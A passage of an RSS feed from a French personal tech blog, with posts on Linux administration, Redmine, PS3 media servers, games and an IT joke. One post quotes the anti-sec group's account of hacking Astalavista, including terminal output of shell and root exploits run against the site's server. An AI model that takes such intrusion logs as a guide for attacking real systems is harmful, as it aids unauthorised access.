&lt;p&gt;Quand j’ai été recruté dans le département informatique d’une grande société, j’ai trouvé 3 lettres laissées par mon prédécesseur dans ce bureau qui était maintenant le mien. Chaque lettre était clairement identifiée, Incident #1, Incident #2, Incident #3. Un post-it était collé au dessus des lettres:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;En cas d’incident grave, ouvrez les lettres dans l’ordre, une par incident. Ca vous aidera à faire face.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;J’ai reposé les lettres dans le tiroir, puis les y ai oublié.&lt;br&gt;
Environ un an après, nous avons eu une série d’incidents qui ont rendu notre intranet et certains serveurs critique de la production injoignables. Pendant que je réparais l’incident, je me suis souvenu des lettres. Curieux, j’ai ouvert la première.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Blâme moi, ton prédécesseur.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Le jour suivant, les serveurs remis en route, mon patron m’a convoqué dans son bureau pour expliquer la raison et la durée de l’incident. Suivant le conseil de la lettre, j’ai blâmé mon prédécesseur, mon patron était satisfait de ma réponse, et je suis parti.&lt;/p&gt;
&lt;p&gt;Six mois plus tard, nous avons eu un nouvel incident. Cette fois, notre serveur de base de donnée principal à planté et le serveur secondaire n’arrivait pas à prendre la charge. J’ai du faire quelques heures supplémentaires pour les remettre d’aplomb mais nous avons perdu quelques transactions à cause du serveur de sauvegarde qui ne fonctionnait pas à cause de la charge.&lt;/p&gt;
&lt;p&gt;Uns fois de plus, je vais ouvrir mon tiroir et ouvre la seconde lettre.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Blâme le matériel&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Cette fois, j’explique que ce n’est pas de ma faute, c’est le serveur de sauvegarde! Si nous avions eu un matériel performant, rien de tout cela ne serait arrivé. Il etait satisfait de ma réponse, et je suis retourné travailler.&lt;br&gt;
La vie à continué paisiblement pendant les 18 mois suivants. Nous avons eu un virus qui à passé nos protections et ravagé nos systèmes.&lt;br&gt;
J’ai ouvert la troisième lettre.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Ecrivez trois lettres.&lt;/p&gt;
&lt;/blockquote&gt;
</content>
    </item>
    
    <item>
      <title>Stlit tellol clouuuuuu</title>
      <link>https://www.lamy.im/posts/stlit-tellol-clouuuuuu/</link>
      <pubDate>Mon, 08 Jun 2009 14:25:30 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/stlit-tellol-clouuuuuu/</guid>
      <description>Combo moto japonaises et musique rap Polonais.
Il y a des MB et des MBX, ces gens ont du gout :-D</description>
      <content>&lt;p&gt;Combo moto japonaises et musique rap Polonais.&lt;/p&gt;
&lt;p&gt;Il y a des MB et des MBX, ces gens ont du gout :-D&lt;/p&gt;

&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;
  &lt;iframe src=&#34;https://www.youtube.com/embed/JntYRdOun9w&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; allowfullscreen title=&#34;YouTube Video&#34;&gt;&lt;/iframe&gt;
&lt;/div&gt;

</content>
    </item>
    
    <item>
      <title>Desproges ce héros</title>
      <link>https://www.lamy.im/posts/desproges-ce-hero/</link>
      <pubDate>Sun, 07 Jun 2009 12:22:37 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/desproges-ce-hero/</guid>
      <description>Je recèle en moi des réserves d’ennui pratiquement inépuisables. Je suis capable de m’ennuyer pendant des heures sans me faire chier.
Pierre Desproges</description>
      <content>&lt;blockquote&gt;
&lt;p&gt;Je recèle en moi des réserves d’ennui pratiquement inépuisables. Je suis capable de m’ennuyer pendant des heures sans me faire chier.&lt;/p&gt;
&lt;p&gt;Pierre Desproges&lt;/p&gt;
&lt;/blockquote&gt;
</content>
    </item>
    
    <item>
      <title>Astalavista piraté</title>
      <link>https://www.lamy.im/posts/astalavista-pirate/</link>
      <pubDate>Sat, 06 Jun 2009 01:07:11 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/astalavista-pirate/</guid>
      <description>Astalavista.com et .net ont été piraté il a quelques heures. Voici la raison invoquée:
Other than the fact that they are not doing any of this for the
« community » but
for the money, they spread exploits for kids, claim to be a
security community
(with no real sense of security on their own servers), and they
charge you $6.66
per months to access a dead forum with a directory filled with</description>
      <content>&lt;p&gt;Astalavista.com et .net ont été piraté il a quelques heures. Voici la raison invoquée:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Other than the fact that they are not doing any of this for the&lt;br&gt;
« community » but&lt;br&gt;
for the money, they spread exploits for kids, claim to be a&lt;br&gt;
security community&lt;br&gt;
(with no real sense of security on their own servers), and they&lt;br&gt;
charge you $6.66&lt;br&gt;
per months to access a dead forum with a directory filled with&lt;br&gt;
public releases&lt;br&gt;
and outdated / broken services.&lt;/p&gt;
&lt;p&gt;We wanted to see how good that « team of security and IT&lt;br&gt;
professionals » really is.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Voici ce qu’on peut lire en haut de la page d’accueil mise sur le site pris pour cible et qui à été envoyé par mail sur une ML traitant de sécurité :&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;[+] Founded in 1997 by a hacker computer enthusiast&lt;br&gt;
[-] Exposed in 2009 by anti-sec group&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Les choses débutent ainsi :&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Let’s begin.&lt;/p&gt;
&lt;p&gt;anti-sec:~# ./g0tshell astalavista.com -p 80&lt;br&gt;
[+] Connecting to astalavista.com:80&lt;br&gt;
[+] Grabbing banner…&lt;br&gt;
LiteSpeed&lt;br&gt;
[+] Injecting shellcode…&lt;br&gt;
[-] Wait for it&lt;/p&gt;
&lt;p&gt;[~] We g0tshell&lt;br&gt;
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5&lt;br&gt;
#1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux&lt;br&gt;
ID: uid=100(apache) gid=500(apache) groups=500(apache)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;2 morceaux choisis :&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;sh-3.2$ ./g0troot -i x86_64&lt;br&gt;
[+] g0troot – anti.sec.labs&lt;br&gt;
[+] Target: 2.6.18-128.1.10.el5&lt;br&gt;
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&amp;gt;]&lt;/p&gt;
&lt;p&gt;[+] r00tr00t&lt;br&gt;
[~] Executing shell…&lt;br&gt;
sh-3.2# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his&lt;br&gt;
milw0rm ripping script(s)&lt;br&gt;
…and the others, find another area to get paid from, security&lt;br&gt;
isn’t for sale and you obviously fail at it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Comme le mail est très long je ne le copierai pas en entier ici, il est lisible sur plusieurs archives. C’est très verbeux et détaillé, bonne lecture à ceux qui veulent.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>C&#39;est le jour de l&#39;imposition</title>
      <link>https://www.lamy.im/posts/cest-le-jour-de-limposition/</link>
      <pubDate>Fri, 05 Jun 2009 19:34:36 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/cest-le-jour-de-limposition/</guid>
      <description>A qui faut il envoyer un formulaire pour être prévenu des changements dans son calendrier ?
Quand sommes nous autorisés à disposer de nous même ?
Je suis toujours sidéré de voir à quel point on à finalement peu de choix :-)
C’est une folie de vouloir l’impossible ; or il est bien impossible de toujours empêcher les méchants de faire ce qu’ils font.
Marc-Aurèle Pensées pour moi-même Livre 5</description>
      <content>&lt;p&gt;A qui faut il envoyer un formulaire pour être prévenu des changements dans son calendrier ?&lt;br&gt;
Quand sommes nous autorisés à disposer de nous même ?&lt;/p&gt;
&lt;p&gt;Je suis toujours sidéré de voir à quel point on à finalement peu de choix :-)&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;C’est une folie de vouloir l’impossible ; or il est bien impossible de toujours empêcher les méchants de faire ce qu’ils font.&lt;/p&gt;
&lt;p&gt;Marc-Aurèle Pensées pour moi-même Livre 5&lt;/p&gt;
&lt;/blockquote&gt;
</content>
    </item>
    
    <item>
      <title>Migration de trac vers redmine ?</title>
      <link>https://www.lamy.im/posts/migration-de-trac-vers-redmine/</link>
      <pubDate>Tue, 26 May 2009 01:00:42 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/migration-de-trac-vers-redmine/</guid>
      <description>Redmine est l&amp;rsquo;outil de gestion de projet concurrent de trac qui monte qui monte.
C&amp;rsquo;est une application qui utilise le framework RoR. J&amp;rsquo;ai voulu le tester et pour cela, j&amp;rsquo;ai importé les données du trac que j&amp;rsquo;utilise.
aptitude install rubygems rake libmysql-ruby libopenssl-ruby libsqlite3-ruby libmysql est nécessaire à Redmine pour utiliser mysql, sqlite3 pour faire l&amp;rsquo;import de trac. Voici à quoi ressemble la migration de trac vers Redmine, l&amp;rsquo;outil fonctionne sans problème.</description>
      <content>&lt;p&gt;Redmine est l&amp;rsquo;outil de gestion de projet concurrent de trac qui monte qui monte.&lt;br&gt;
C&amp;rsquo;est une application qui utilise le framework RoR. J&amp;rsquo;ai voulu le tester et pour cela, j&amp;rsquo;ai importé les données du trac que j&amp;rsquo;utilise.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;aptitude install rubygems rake libmysql-ruby libopenssl-ruby libsqlite3-ruby
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;libmysql est nécessaire à Redmine pour utiliser mysql, sqlite3 pour faire l&amp;rsquo;import de trac.
Voici à quoi ressemble la migration de trac vers Redmine, l&amp;rsquo;outil fonctionne sans problème.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ rake redmine:migrate_from_trac RAILS_ENV=&amp;#34;production
WARNING: a new project will be added to Redmine during this process.
Are you sure you want to continue ? [y/N] Y
Trac directory []: /home/trac/blahblah/
Trac database adapter (sqlite, sqlite3, mysql, postgresql) [sqlite]: sqlite3
Trac database encoding [UTF-8]:
Target project identifier []: blahblah
This project already exists in your Redmine database.
Are you sure you want to append data to this project ? [Y/n] y
Migrating components
Migrating milestones
Migrating custom fields
Migrating tickets
Migrating wiki
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Tout est présent, les utilisateurs sont fonctionnels.
Après un rapide tour du propriétaire, voici mes premières impressions sur Redmine :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Supporte nativement multiprojets&lt;/li&gt;
&lt;li&gt;Il permet d&amp;rsquo;utiliser un forum, joindre des documents par projet&lt;/li&gt;
&lt;li&gt;Il se comporte comme un client svn distant et n&amp;rsquo;a pas besoin d&amp;rsquo;avoir accès au FS comme trac&lt;/li&gt;
&lt;li&gt;Interface d&amp;rsquo;administration très complete&lt;/li&gt;
&lt;li&gt;Diagramme de Gantt automatique&lt;/li&gt;
&lt;/ul&gt;
</content>
    </item>
    
    <item>
      <title>Test de la démo d&#39;Infamous sur PS3</title>
      <link>https://www.lamy.im/posts/test-de-la-demo-dinfamous-sur-ps3/</link>
      <pubDate>Mon, 18 May 2009 20:12:36 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/test-de-la-demo-dinfamous-sur-ps3/</guid>
      <description>Grâce aux ouf guedin du jeu vidéo j’ai pu gagner un code pour télécharger la démo d’Infamous.
La démo sera officiellement disponible le 21 mai sur le Playstation Network et le jeu complet à partir du 27 mai.
Dans une ville dévastée par un cataclysme et un virus, en quarantaine, livrée aux bandes, on incarne Cole qui détient des super pouvoir d’éléctricité 🙂
La démo nous permet d’aller dans le vif du sujet sans perdre de temps.</description>
      <content>&lt;p&gt;Grâce aux &lt;a href=&#34;http://www.gameblog.fr&#34;&gt;ouf guedin du jeu vidéo&lt;/a&gt; j’ai pu gagner un code pour télécharger la démo d’Infamous.&lt;/p&gt;
&lt;p&gt;La démo sera officiellement disponible le 21 mai sur le Playstation Network et le jeu complet à partir du 27 mai.&lt;/p&gt;
&lt;p&gt;Dans une ville dévastée par un cataclysme et un virus, en quarantaine, livrée aux bandes, on incarne Cole qui détient des super pouvoir d’éléctricité 🙂&lt;br&gt;
La démo nous permet d’aller dans le vif du sujet sans perdre de temps. On escorte un train jusqu’a bon port, on détruit des camion remplis de poison et on sauve un chateau d’eau.&lt;/p&gt;
&lt;p&gt;Cole peut grimper à peu près partout, à la manière de Spiderman. Le pouvoir de planer dans les air permet seulement de réduire la vitesse de sa chute, cela donne bien la sensation de n’etre qu’un humain. On peut attaquer soit au corps à corps, soit avec ses pouvoirs éléctriques. Dans la ville, il y à de nombreuses sources d’energies, celles ci peuvent servir à Cole pour remplir sa reserve d’éléctricité et de santé.&lt;/p&gt;
&lt;p&gt;Le jeu est assez aliasé et certains ennemis sont plutôt coriaces. Quand Cole meurt, on revient au dernier checkpoint, heureusement ils sont assez nombreux ce qui évite trop de frustrations.&lt;/p&gt;
&lt;p&gt;En conclusion, le jeux est plutpot beau bien qu’aliasé, les doublages sont de bonne qualité, l’ambiance de la ville est très particuliere et colle bien à l’histoire. Esperons que le scénario tiendra la route car il y a de quoi faire.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>emerge world sur gentoo millésime</title>
      <link>https://www.lamy.im/posts/emerge-world-sur-gentoo-millesime/</link>
      <pubDate>Mon, 18 May 2009 19:32:45 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/emerge-world-sur-gentoo-millesime/</guid>
      <description>Il y à quelques jours j’ai entrepris de réutiliser ma machine de stockage. Une gentoo laissée à l’abandon depuis plusieurs mois (année?) m’y attendait.
A ma grande suprise la mise à jour s’est très bien passée… sauf pour xorg. Comme à l’acoutumée les grosses mises à jour de xorg se font dans la douleur.
Depuis xorg 1.5 la gestion du couple clavier/souris est laissée à HAL par defaut. C’est la raison pour laquelle malgrès mon xorg.</description>
      <content>&lt;p&gt;Il y à quelques jours j’ai entrepris de réutiliser ma machine de stockage. Une gentoo laissée à l’abandon depuis plusieurs mois (année?) m’y attendait.&lt;/p&gt;
&lt;p&gt;A ma grande suprise la mise à jour s’est très bien passée… sauf pour xorg. Comme à l’acoutumée les grosses mises à jour de xorg se font dans la douleur.&lt;/p&gt;
&lt;p&gt;Depuis xorg 1.5 la gestion du couple clavier/souris est laissée à HAL par defaut. C’est la raison pour laquelle malgrès mon xorg.conf, X s’obstinait à mapper mon clavier en qwerty ce qui ne m&amp;rsquo;arrange pas vraiment.&lt;/p&gt;
&lt;p&gt;HAL n’a pas inventé la poudre, il faut donc lui signifier la configuration voulue pour le clavier.&lt;br&gt;
&lt;code&gt;cp /usr/share/hal/fdi/policy/10osvendor/10-keymap.fdi /etc/hal/fdi/policy/&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Ensuite, éditer la ligne du input.xkb.layout et mettre la valeur souhaitée.&lt;/p&gt;
&lt;p&gt;restart de HAL, X and voila 🙂&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>MediaTomb comme serveur DLNA pour la ps3</title>
      <link>https://www.lamy.im/posts/mediatomb-serveur-dlna-ps3/</link>
      <pubDate>Sat, 02 May 2009 13:42:33 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/mediatomb-serveur-dlna-ps3/</guid>
      <description>Installer linux sur sa ps3 pour émuler de vieilles consoles et lires des fichiers exotiques c’est bien, utiliser ses fonctions DLNA pour acceder à toute sa mediathèque c’est mieux 🙂
J’ai installé MediaTomb sous gentoo, un simple emerge mediatomb suffit, suivi d’un rc-update add mediatomb default pour ne plus avoir à y penser.
L’interface d’admin est accesible sur http://localhost:49142 par defaut.
Il suffit ensuite d’ajouter les repertoires que l’on veut a la DB de MediaTomb et le tour est joué.</description>
      <content>&lt;p&gt;Installer linux sur sa ps3 pour émuler de vieilles consoles et lires des fichiers exotiques c’est bien, utiliser ses fonctions DLNA pour acceder à toute sa mediathèque c’est mieux 🙂&lt;/p&gt;
&lt;p&gt;J’ai installé MediaTomb sous gentoo, un simple &lt;em&gt;emerge mediatomb&lt;/em&gt; suffit, suivi d’un &lt;em&gt;rc-update add mediatomb default&lt;/em&gt; pour ne plus avoir à y penser.&lt;/p&gt;
&lt;p&gt;L’interface d’admin est accesible sur &lt;em&gt;http://localhost:49142&lt;/em&gt; par defaut.&lt;/p&gt;
&lt;p&gt;Il suffit ensuite d’ajouter les repertoires que l’on veut a la DB de MediaTomb et le tour est joué. musique, videos et photos sont directement accessible depuis le ps3!&lt;/p&gt;
&lt;p&gt;Pour le firmware 2.7 de la playstation, il y à une petite finesse expliquée dans &lt;a href=&#34;http://mediatomb.cc/dokuwiki/faq:faq#ps3_won_t_play_.avi_files_anymore_after_updating_to_2.70&#34; title=&#34;FAQ de MediaTomb&#34;&gt;la FAQ&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Attention nénmoins a la consomation mémoire lors d’ajout de répertoire chargés en vidéos.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>yellow dog 6.1 sur ps3</title>
      <link>https://www.lamy.im/posts/yellow-dog-6-1-sur-ps3/</link>
      <pubDate>Fri, 01 May 2009 11:20:32 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/yellow-dog-6-1-sur-ps3/</guid>
      <description>Hop,
J’ai voulu tester la distribution qui est sensée supporter au mieux la ps3 out of the box. Il s’agit de Yellow Dog Linux, un DVD spécial PS3 est disponible sur les mirroirs, elle utilisé enlightenment DR17 comme Desktop Shell par défaut et si mémoire est bonne, est capable d’utiliser la mémoire du RSX comme de la RAM.
Le DVD de YDL 6.1 dans la console, on choisi la résolution souhaitée pour l’installation et c’est parti.</description>
      <content>&lt;p&gt;Hop,&lt;/p&gt;
&lt;p&gt;J’ai voulu tester la distribution qui est sensée supporter au mieux la ps3 out of the box. Il s’agit de Yellow Dog Linux, un DVD spécial PS3 est disponible sur les mirroirs, elle utilisé enlightenment DR17 comme Desktop Shell par défaut et si mémoire est bonne, est capable d’utiliser la mémoire du RSX comme de la RAM.&lt;br&gt;
Le DVD de YDL 6.1 dans la console, on choisi la résolution souhaitée pour l’installation et c’est parti.&lt;/p&gt;
&lt;p&gt;Rien de bien inhabituel a l’horizon, l’installeur est simple et plutot joli, il propose meme de s’abonner au service premier pour benefier pleinement de la distro.&lt;/p&gt;
&lt;p&gt;L’installation est très guidée et la portée de tous, tout s’est bien passé, j’ai néanmoins relevé quelques points noirs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Malgrès spécifié de ne pas installer gnome et les programmes connexe, j’ai eu droit a certains&lt;/li&gt;
&lt;li&gt;Le build d’E17 est assez ancien&lt;/li&gt;
&lt;li&gt;Malgrès la configuration du clavier dans l’installeur, le clavier etait US sous X&lt;/li&gt;
&lt;li&gt;Très peu de paquets disponibles de base, les codecs videos sont payants et l’accès aux repository supplémentaires necessite un compte premium&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;L’interêt d’installer linux sur sa PS3 étant déjà limité, on comprend mal pourquoi certains codecs videos sont facturés 14€.&lt;br&gt;
Pour ajouter des paquets avec un peu de souplesse, il faut jongler entre repository fedora, centOS et non officiels, la j’ai pu installer émulateur, mplayer, claws-mail et d’autres paquets non inclus dans le repos de base de YDL.&lt;/p&gt;
&lt;p&gt;Quand j’aurai un peu plus de temps, je testerai surement gentoo dont la flexibilité sera apréciable pour ce type de hardware.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>megaman 2 le retour</title>
      <link>https://www.lamy.im/posts/megaman-2-le-retour/</link>
      <pubDate>Thu, 19 Mar 2009 12:02:38 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/megaman-2-le-retour/</guid>
      <description>Peut etre une idée de soundtrack pour mégaman 10 ? 🙂</description>
      <content>&lt;p&gt;Peut etre une idée de soundtrack pour mégaman 10 ? 🙂&lt;/p&gt;

&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;
  &lt;iframe src=&#34;https://www.youtube.com/embed/QUEO9Mfmn4M&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; allowfullscreen title=&#34;YouTube Video&#34;&gt;&lt;/iframe&gt;
&lt;/div&gt;

</content>
    </item>
    
    <item>
      <title>riposte graduée toi même !</title>
      <link>https://www.lamy.im/posts/riposte-graduee-toi-meme/</link>
      <pubDate>Mon, 02 Mar 2009 23:55:40 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/riposte-graduee-toi-meme/</guid>
      <description></description>
      <content>&lt;p&gt;&lt;a href=&#34;http://www.laquadrature.net/HADOPI&#34; title=&#34;HADOPI - Le Net en France : black-out&#34;&gt;&lt;img src=&#34;//media.laquadrature.net/Quadrature_black-out_HADOPI_300x250px.gif&#34; alt=&#34;HADOPI - Le Net en France : black-out&#34;&gt;&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>D-Pad Hero, le jeu musical pour NES</title>
      <link>https://www.lamy.im/posts/d-pad-hero-le-jeu-musical-pour-nes/</link>
      <pubDate>Sat, 07 Feb 2009 22:58:47 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/d-pad-hero-le-jeu-musical-pour-nes/</guid>
      <description>Pour les fan de jeux musicaux, inutile d’acheter les dernières consoles pour se prendre pour une superstar de la musique sur guitar hero ou rock band.
ça éxiste pour NES et c’est disponible par là 🙂
4 chansons sont disponibles pour le moment:
Sweet Child o’ Mine de gun’s and roses The Way You Make Me Feel de Michael Jackson The Swing of Things de Scoundrel Days </description>
      <content>&lt;p&gt;Pour les fan de jeux musicaux, inutile d’acheter les dernières consoles pour se prendre pour une superstar de la musique sur guitar hero ou rock band.&lt;/p&gt;
&lt;p&gt;ça éxiste pour NES et c’est disponible &lt;a href=&#34;http://dpadhero.com/Home.html&#34;&gt;par là&lt;/a&gt; 🙂&lt;/p&gt;
&lt;p&gt;4 chansons sont disponibles pour le moment:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sweet Child o’ Mine de gun’s and roses&lt;/li&gt;
&lt;li&gt;The Way You Make Me Feel de Michael Jackson&lt;/li&gt;
&lt;li&gt;The Swing of Things de Scoundrel Days&lt;/li&gt;
&lt;/ul&gt;

&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;
  &lt;iframe src=&#34;https://www.youtube.com/embed/f8bdWTBqws0&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; allowfullscreen title=&#34;YouTube Video&#34;&gt;&lt;/iframe&gt;
&lt;/div&gt;

</content>
    </item>
    
    <item>
      <title>Passage à ejabberd 2.0.3</title>
      <link>https://www.lamy.im/posts/passage-a-ejabberd-203/</link>
      <pubDate>Tue, 03 Feb 2009 17:11:24 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/passage-a-ejabberd-203/</guid>
      <description>Le serveur jabber passe sur cette version qui corrige pas mal de bug en même temps qu’il change de machine 🙂
Si toi aussi tu veux etre beau grand et fort: par ici la bonne soupe.</description>
      <content>&lt;p&gt;Le serveur jabber passe sur cette version qui corrige pas mal de bug en même temps qu’il change de machine 🙂&lt;/p&gt;
&lt;p&gt;Si toi aussi tu veux etre beau grand et fort: &lt;a href=&#34;http://www.ejabberd.im/&#34;&gt;par ici la bonne soupe.&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>la tête d&#39;oeuf refuse le background !</title>
      <link>https://www.lamy.im/posts/eggdrop-background-debian-lenny/</link>
      <pubDate>Tue, 03 Feb 2009 17:01:28 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/eggdrop-background-debian-lenny/</guid>
      <description>La migration vers les VM Xen toutes fraiches continue.
kasimir, notre eggdrop d&amp;rsquo;amour fait son récalcitrant. Lancé en foreground, il se connecte correctement au serveur mais pas en mode background… gênant pour un bot irc 🙂
Heureusement, la solution est expliquée ici. Il faut patcher et compiler avec l’option –enable-tcl-threadsmake et roulez jeunesse.
Pour ceux qui utilisent le paquet eggdrop debian le patch est deja intégré à testing.
(oui, le bug date de plusieurs mois, et alors ?</description>
      <content>&lt;p&gt;La migration vers les VM Xen toutes fraiches continue.&lt;/p&gt;
&lt;p&gt;kasimir, notre eggdrop d&amp;rsquo;amour fait son récalcitrant. Lancé en foreground, il se connecte correctement au serveur mais pas en mode background… gênant pour un bot irc 🙂&lt;/p&gt;
&lt;p&gt;Heureusement, la solution est expliquée &lt;a href=&#34;http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=487541#33&#34;&gt;ici&lt;/a&gt;. Il faut patcher et compiler avec l’option –enable-tcl-threadsmake et roulez jeunesse.&lt;/p&gt;
&lt;p&gt;Pour ceux qui utilisent le paquet eggdrop debian le patch est deja intégré à testing.&lt;br&gt;
(oui, le bug date de plusieurs mois, et alors ?)&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Mais ils sont fous ces debianeux</title>
      <link>https://www.lamy.im/posts/mais-ils-sont-fous-ces-debianeux/</link>
      <pubDate>Tue, 03 Feb 2009 02:58:10 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/mais-ils-sont-fous-ces-debianeux/</guid>
      <description>Released when it’s done 😀</description>
      <content>&lt;p&gt;&lt;a href=&#34;http://lists.debian.org/debian-devel/2009/02/msg00020.html&#34;&gt;Released when it’s done 😀&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Les disques dur qui vont sur l&#39;eau ont ils des jambes?</title>
      <link>https://www.lamy.im/posts/crash-disque/</link>
      <pubDate>Mon, 02 Feb 2009 14:32:40 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/crash-disque/</guid>
      <description>Il y a 15 jours, un des disque dur du serveur hebergeant le site a rendu l’âme. J’ai décidé de profiter de cette mésaventure pour changer de serveur et jouer avec Xen.
La plus grande partie est maintenant migrée. Le wiki ne répondant plus au besoins et subissant trop de spam, le site réapparait sous forme d’un blog. Certaines pages du wiki ne seront pas reprises ici, c’est l’occasion d’un dépoussiérage.</description>
      <content>&lt;p&gt;Il y a 15 jours, un des disque dur du serveur hebergeant le site a rendu l’âme. J’ai décidé de profiter de cette mésaventure pour changer de serveur et jouer avec Xen.&lt;/p&gt;
&lt;p&gt;La plus grande partie est maintenant migrée. Le wiki ne répondant plus au besoins et subissant trop de spam, le site réapparait sous forme d’un blog. Certaines pages du wiki ne seront pas reprises ici, c’est l’occasion d’un dépoussiérage.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>ebuild pour tinyproxy 1.7.0</title>
      <link>https://www.lamy.im/posts/ebuild-pour-tinyproxy-170/</link>
      <pubDate>Sun, 14 Dec 2008 04:29:13 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/ebuild-pour-tinyproxy-170/</guid>
      <description>J’ai voulu testé tinyproxy 1.7.0 qui intègre la fonction de reverse proxy. Cette version n’est pas dans portage donc j’ai mis à jour l’ebuild de la version 1.6 pour installer proprement cette version de dev..
Cet ebuild est à placer dans un overlay. La création d’un overlay est expliquée dans un précédent billet.</description>
      <content>&lt;p&gt;J’ai voulu testé tinyproxy 1.7.0 qui intègre la fonction de reverse proxy. Cette version n’est pas dans portage donc j’ai mis à jour  l’ebuild de la version 1.6 pour installer proprement cette version de dev..&lt;/p&gt;
&lt;p&gt;Cet ebuild est à placer dans un overlay. &lt;a href=&#34;https://www.lamy.im/mod_security-sur-gentoo/&#34;&gt;La création d’un overlay est expliquée dans un précédent billet&lt;/a&gt;.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Installer Enlightenment DR 17 depuis les sources</title>
      <link>https://www.lamy.im/posts/installer-enlightenment-dr17-depuis-les-sources-svn/</link>
      <pubDate>Sat, 29 Nov 2008 19:18:00 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/installer-enlightenment-dr17-depuis-les-sources-svn/</guid>
      <description>Enlightenment DR 17 bouge beaucoup ces temps ci.
Après la migration vers le SVN tout neuf, la réorganisation du dépot et le peaufinage des bibliothèques EFL core, les ebuilds de l’overlay enlightenment de gentoo ne fonctionnent plus.
Ci dessous un rapide mémo pour l’installation d’e17 et entrance. Checkout pour e17:
svn co http://svn.enlightenment.org/svn/e/trunk/eina svn co http://svn.enlightenment.org/svn/e/trunk/eet svn co http://svn.enlightenment.org/svn/e/trunk/evas svn co http://svn.enlightenment.org/svn/e/trunk/ecore svn co http://svn.enlightenment.org/svn/e/trunk/efreet svn co http://svn.enlightenment.org/svn/e/trunk/embryo svn co http://svn.</description>
      <content>&lt;p&gt;Enlightenment DR 17 bouge beaucoup ces temps ci.&lt;/p&gt;
&lt;p&gt;Après la migration vers le SVN tout neuf, la réorganisation du dépot et le peaufinage des bibliothèques EFL core, les ebuilds de l’overlay enlightenment de gentoo ne fonctionnent plus.&lt;/p&gt;
&lt;p&gt;Ci dessous un rapide mémo pour l’installation d’e17 et entrance. Checkout pour e17:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;svn co http://svn.enlightenment.org/svn/e/trunk/eina
svn co http://svn.enlightenment.org/svn/e/trunk/eet
svn co http://svn.enlightenment.org/svn/e/trunk/evas
svn co http://svn.enlightenment.org/svn/e/trunk/ecore
svn co http://svn.enlightenment.org/svn/e/trunk/efreet
svn co http://svn.enlightenment.org/svn/e/trunk/embryo
svn co http://svn.enlightenment.org/svn/e/trunk/edje
